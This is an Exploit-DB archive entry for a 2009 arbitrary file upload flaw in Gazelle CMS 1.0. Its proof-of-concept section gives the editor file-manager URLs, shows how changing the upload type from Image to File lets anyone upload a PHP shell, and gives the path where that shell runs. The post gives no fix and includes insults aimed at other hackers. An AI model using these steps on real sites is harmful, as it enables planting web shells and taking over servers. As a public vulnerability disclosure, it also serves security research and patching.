Gazelle CMS 1.0 - Arbitrary File Upload

EDB-ID:

9433

CVE:

2009-3182

EDB Verified:

Author:

RoMaNcYxHaCkEr

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-08-13

Vulnerable App:

   ====================================================
   | Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln  
   |     My Home Page : WwW.Sec-Code.CoM
   |        Founded By RoMaNcYxHaCkEr            
   ====================================================
 
[!] Discovered.:                        RoMaNcYxHaCkEr

[!] Vendor.....:                        http://www.anantasoft.com/index.php?Gazelle%20CMS/Download

[!] My Homepage...:                     WwW.Sec-Code.CoM

[!] Security - Codes Group ...:         aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code

[!] Contact Me ...:                     rXh@Mail.Net.Sa
 
[!] PoC........:
 
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image
^^^^
This Is Default In Editor admin
Try Change Image To File Like This :
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File
Upload Any Shell.php Then You See That,s Here E.G. :
http://localhost/Ananta_Gazelle1.0/user/File/shell.php
 
[!] Solution...:     I Don,t Know He He :D , Contact With Me ;)
 
[!] Greetingz..:     All My Forum Members , My TeaM , Dexter Franklin ;)
 
[!] Thx .. :            Ø·Ø§Ù„Ø¨ Ù…ØªØÙ…Ø³ , IHTTeam For His Exploit
 
[!] Fuck To .. : Third , Dev1l-Fucker <<< They Big Big Big Big Lamerz
 
[!] rXh
 
[!] bEST wISHES

# milw0rm.com [2009-08-13]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services